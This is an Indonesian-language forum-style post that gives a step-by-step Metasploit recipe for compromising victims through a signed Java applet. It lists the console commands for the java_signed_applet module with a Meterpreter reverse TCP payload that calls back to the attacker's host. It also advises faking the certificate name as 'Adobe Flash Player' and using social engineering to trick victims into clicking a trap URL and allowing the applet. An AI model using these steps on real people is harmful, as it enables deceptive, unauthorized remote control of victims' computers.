kali ini ane mau share cara exploit dengan java signet
dengan catatan sang korban harus menginstall java..
sedikit info kegunaan Java :
salah satu nya untuk Membantu pembuatan program untuk dijalankan dalam browser Web dan layanan Web.
seperti virus scanner online,website can you run it,dan masih banyak lagi...
oke,kembali ke topik
cara exploit nya hampir sama dengan yg kemarin ane share ya itu shourcut shell
dengan mengirim file" exploit ke ip korban
tapi java signet ini lebih mantap lagi
saat korban mengklik url path jebakan kita
(ipheker.com/urlpart)
sedikit dengan soceng,agar menyakinkan korban agar mengallow koneksi java
dan trick ini aman dari virus :D
bagaimana cara nya ? cekidot..
buka console metasploit kalian
> use exploit/multi/browser/java_signed_applet
> set payload windows/meterpreter/reverse_tcp
> show options
> set appletname clound_music (kasih nama yang bisa meyakinkan korban)
> set certcn Adobe Flash Player
> set srvhost [IP ente]
> set srvport 80 [karna memakai web browser]
> set uripath music [ip.com/path]
> set lhost [ip ente]
> set lport 443
> exploit
nah klo exploit sudah di jalankan
sekarang kita bujuk korban untuk masuk ke perangkap kita
dan begitu korban mengexekusi jebakan kita
langsung muncul jendela security Java,
berdoa aja agar korban mengkilk allow
dan kita masuk kita ke kompi korban deh :D
sekian dari saya
Clound
